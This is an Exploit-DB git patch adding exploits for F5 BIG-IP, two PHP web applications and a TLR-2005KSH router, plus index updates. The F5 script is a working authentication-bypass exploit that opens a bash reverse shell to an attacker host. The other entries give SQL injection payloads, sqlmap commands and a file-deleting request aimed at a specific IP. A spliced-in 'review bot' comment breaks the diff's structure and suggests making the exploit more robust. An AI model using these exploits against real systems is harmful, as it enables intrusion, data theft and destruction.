From 6b9b8c54349b1a511ed9458f05f74dd2ac23ad5b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 13 May 2022 05:01:39 +0000
Subject: [PATCH] DB: 2022-05-13

7 changes to exploits/shellcodes

Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)
F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
College Management System 1.0 - 'course_code' SQL Injection (Authenticated)
Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
TLR-2005KSH - Arbitrary File Delete
---
 exploits/hardware/webapps/50935.txt | 21 +++++++
 exploits/multiple/remote/50932.py | 66 +++++++++++++++++++++
 exploits/php/webapps/50933.txt | 54 +++++++++++++++++
 exploits/php/webapps/50934.txt | 66 +++++++++++++++++++++
 exploits/windows/{local => remote}/50913.py | 2 +-
 files_exploits.csv | 6 +-
 6 files changed, 213 insertions(+), 2 deletions(-)
 create mode 100644 exploits/hardware/webapps/50935.txt
 create mode 100755 exploits/multiple/remote/50932.py
 create mode 100644 exploits/php/webapps/50933.txt
 create mode 100644 exploits/php/webapps/50934.txt
 rename exploits/windows/{local => remote}/50913.py (94%)

diff --git a/exploits/hardware/webapps/50935.txt b/exploits/hardware/webapps/50935.txt
new file mode 100644
index 000000000..bb2d708ad
--- /dev/null
+++ b/exploits/hardware/webapps/50935.txt
@@ -0,0 +1,21 @@
+# Exploit Title: TLR-2005KSH - Arbitrary File Delete
+# Date: 2022-05-11
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: 1.0.0
+# Vendor home page : http://telesquare.co.kr/
+# Authentication Required: No
+# Tested on: Windows
+# CVE: CVE-2021-46424
+
+# Proof-of-Concept
+# Request
+
+DELETE /cgi-bin/test2.txt HTTP/1.1
+Host: 220.89.223.215:8083
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
\ No newline at end of file
diff --git a/exploits/multiple/remote/50932.py b/exploits/multiple/remote/50932.py
new file mode 100755
index 000000000..a70621fc7
--- /dev/null
+++ b/exploits/multiple/remote/50932.py
@@ -0,0 +1,66 @@ +# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) +# Exploit Author: Yesith Alvarez +# Vendor Homepage: https://www.f5.com/products/big-ip-services +# Version: 16.0.x +# CVE : CVE-2022-1388 + +from requests import Request, Session +import sys +import json + + + +def title(): + print(''' + + _______ ________ ___ ___ ___ ___ __ ____ ___ ___ + / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ + | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | + | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < + | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | + \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/ + + + +Author: Yesith Alvarez +Github: https://github.com/yealvarez +Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ + ''') + +def exploit(url, lhost, lport): + url = url + 'mgmt/tm/util/bash' + data = { + "command":"run", + "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" + + } + headers = { + 'Authorization': 'Basic YWRtaW46', + 'Connection':'keep-alive, X-F5-Auth-Token', + 'X-F5-Auth-Token': '0' + + } + s = Session() + req = Request('POST', url, json=data, headers=headers) + prepped = req.prepare() + del prepped.headers['Content-Type'] + resp = s.send(prepped, + verify=False, + timeout=15 + ) + #print(prepped.headers) + #print(url) + #print(resp.headers) + #print(resp.json()) + print(resp.status_code) + + +if __name__ == '__main__': + title() + if(len(sys.argv) < 4): + print('[+] USAGE: python3 %s https:// lhost lport\n'%(sys.argv[0])) + print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) + print('[+] Do not forget to run the listener: nc -lvp 4444\n') + exit(0) + else: + exploit(sys.argv[1],sys.argv[2],sys.argv[3]) \ No newline at end of file diff --git a/exploits/php/webapps/50933.txt b/exploits/php/webapps/50933.txt new file mode 100644 index 000000000..334ef27cb --- /dev/null 
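Review bot: The header block at the top of 50932.py lacks the `# Date:` and `# Tested on:` lines that the other three advisories in this commit (50933, 50934, 50935) carry; add `# Date: <YYYY-MM-DD>` and `# Tested on: <platform>` under `# Exploit Author:` (placeholders, since the commit does not give the values). In the `__main__` block the usage path ends with `exit(0)`, which reports success to a calling shell after refusing to run; `sys.exit(1)` is the conventional status for bad arguments and does not depend on the `site`-provided `exit` builtin. `exploit()` also lets any `requests` failure on `s.send(...)` (timeout, refused connection, TLS error) escape as a bare traceback and prints only `resp.status_code`, so a reader cannot distinguish a transport error from a non-2xx response; a `try`/`except requests.exceptions.RequestException as err:` around the send with a one-line message would make the outcome explicit.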
+++ b/exploits/php/webapps/50933.txt 
@@ -0,0 +1,54 @@
+# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
+# Date: 2022-24-03
+# Exploit Author: Eren Gozaydin
+# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
+# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
+# Version: 1.0
+# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
+# CVE: CVE-2022-28079
+# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
+
+------------------------------------------------------------------------------------
+
+1. Description:
+----------------------
+
+College Management System 1.0 allows SQL Injection via parameter 'course_code' in
+/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from the affected page with
+'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r poc.txt --dbms=mysql
+
+
+3. Example payload:
+----------------------
+
+boolean-based blind
+Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
+
+
+4. Burpsuite request:
+----------------------
+
+POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Content-Length: 80
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
+Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
+User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
+
+submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
\ No newline at end of file
diff --git a/exploits/php/webapps/50934.txt b/exploits/php/webapps/50934.txt
new file mode 100644
index 000000000..7fef92795
--- /dev/null
+++ b/exploits/php/webapps/50934.txt
@@ -0,0 +1,66 @@
+# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
+# Date: 2022-26-03
+# Exploit Author: Eren Gozaydin
+# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+# Version: 1.0
+# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
+# CVE: CVE-2022-28080
+# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080
+
+------------------------------------------------------------------------------------
+
+1. Description:
+----------------------
+
+Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in
+/royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from the affected page with
+'todate' parameter and save it like poc.txt. Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r poc.txt --dbms=mysql
+
+
+3. Example payload:
+----------------------
+
+(boolean-based)
+
+-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
+
+4. Burpsuite request:
+----------------------
+
+POST /royal_event/btndates_report.php#?= HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Content-Length: 334
+Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
+Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
+Referer: http://localhost/royal_event/btndates_report.php#?=
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
+
+--f289a6438bcc45179bcd3eb7ddc555d0
+Content-Disposition: form-data; name="todate"
+
+-1' OR 1=1 OR 'ns'='ns
+--f289a6438bcc45179bcd3eb7ddc555d0
+Content-Disposition: form-data; name="search"
+
+3
+--f289a6438bcc45179bcd3eb7ddc555d0
+Content-Disposition: form-data; name="fromdate"
+
+01/01/2011
+--f289a6438bcc45179bcd3eb7ddc555d0--
\ No newline at end of file
diff --git a/exploits/windows/local/50913.py b/exploits/windows/remote/50913.py
similarity index 94%
rename from exploits/windows/local/50913.py
rename to exploits/windows/remote/50913.py
index 1c6f6464d..cb171d2f0 100755
--- a/exploits/windows/local/50913.py
+++ b/exploits/windows/remote/50913.py
@@ -1,4 +1,4 @@
-# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
+# Exploit Title: Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)
 # Date: 4/27/2022
 # Exploit Author: Netanel Cohen & Tomer Peled
 # Vendor Homepage: https://drfone.wondershare.net/
diff --git a/files_exploits.csv b/files_exploits.csv
index c57f9b09d..979bcefd8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11486,7 +11486,6 @@ id,file,description,date,author,type,platform,port
 50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows,
 50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux,
 50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows,
-50913,exploits/windows/local/50913.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)",1970-01-01,"Netanel Cohen",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18688,6 +18687,8 @@ id,file,description,date,author,type,platform,port
 50904,exploits/windows/remote/50904.py,"ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure",1970-01-01,"Metin Yunus Kandemir",remote,windows,
 50906,exploits/hardware/remote/50906.txt,"DLINK DIR850 - Insecure Access Control",1970-01-01,"Ahmed Alroky",remote,hardware,
 50907,exploits/hardware/remote/50907.txt,"DLINK DIR850 - Open Redirect",1970-01-01,"Ahmed Alroky",remote,hardware,
+50913,exploits/windows/remote/50913.py,"Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)",1970-01-01,"Netanel Cohen",remote,windows,
+50932,exploits/multiple/remote/50932.py,"F5 BIG-IP 16.0.x - Remote Code Execution (RCE)",1970-01-01,"Yesith Alvarez",remote,multiple,
 50914,exploits/linux/remote/50914.py,"Apache CouchDB 3.2.1 - Remote Code Execution (RCE)",1970-01-01,"Konstantin Burov",remote,linux,
 50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",1970-01-01,LiquidWorm,remote,hardware,
 50917,exploits/multiple/remote/50917.js,"Google Chrome 78.0.3904.70 - Remote Code Execution",1970-01-01,"Forrest Orr",remote,multiple,
@@ -44994,3 +44995,6 @@ id,file,description,date,author,type,platform,port
 50925,exploits/php/webapps/50925.html,"WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Abisheik M",webapps,php,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",1970-01-01,"Wolfgang Hotwagner",webapps,php,
 50928,exploits/php/webapps/50928.txt,"WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50933,exploits/php/webapps/50933.txt,"College Management System 1.0 - 'course_code' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php,
+50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php,
+50935,exploits/hardware/webapps/50935.txt,"TLR-2005KSH - Arbitrary File Delete",1970-01-01,"Ahmed Alroky",webapps,hardware,